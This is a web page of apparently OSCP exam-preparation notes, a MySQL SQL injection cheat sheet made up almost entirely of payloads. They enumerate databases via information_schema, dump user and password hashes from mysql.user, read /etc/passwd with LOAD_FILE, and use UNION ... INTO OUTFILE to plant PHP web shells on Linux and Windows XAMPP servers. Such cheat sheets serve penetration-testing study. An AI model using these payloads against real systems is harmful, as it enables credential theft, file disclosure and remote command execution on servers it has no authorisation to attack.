// notes/ Web Exploitation
🕸️
SQL Injection MySQL Cheatsheet
Notes from oscp.adot8.com — web applications.
#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_mysql-cheatsheet ↗MySQL Cheatsheet
code
01SELECT database()02SELECT schema_name FROM information_schema.schemata03SELECT schema_name FROM information_schema.schemata LIMIT 104SELECT schema_name FROM information_schema.schemata LIMIT 2,1 <-- Grab second entry output limit of 1 05SELECT group_concat(schema_name,":") FROM information_schema.schemata06SELECT group_concat(schema_name,"\r\n") FROM information_schema.schemata07SELECT group_concat(host,":",user,":",password,"\r\n") FROM mysql.usercode
01SELECT schema_name FROM information_schema.schemata02 code
01select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'code
01select group_concat(host,":",user,":",password,"\r\n") from mysql.usercode
01LOAD_FILE("/etc/passwd")02TO_base64(LOAD_FILE("/etc/passwd"))code
01'union select 1,2,3,4,5-- -02 03' union select 1, table_name, column_name, table_schema, 5 from 04information_schema.columns where table_schema=database() -- //SQL injection into RCE
code
01select user()Check write privileges
code
01select group_concat(grantee,is_grantable,0x3c62723e) from information_schema.user_privilegesFor Linux
code
01union select ("<?php system($_GET["cmd"]);?>),2,3,4,5 into outfile02"/var/www/html/cmd.php" -- -code
01' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, 02null, null INTO OUTFILE "/var/www/html/tmp/cmd.php" -- -For Windows Xampp
code
01union select 1,('<?php echo shell_exec($_GET["cmd"]); ?>'),3 into outfile 'C:\\xampp\\htdocs\\cmd.php'-- -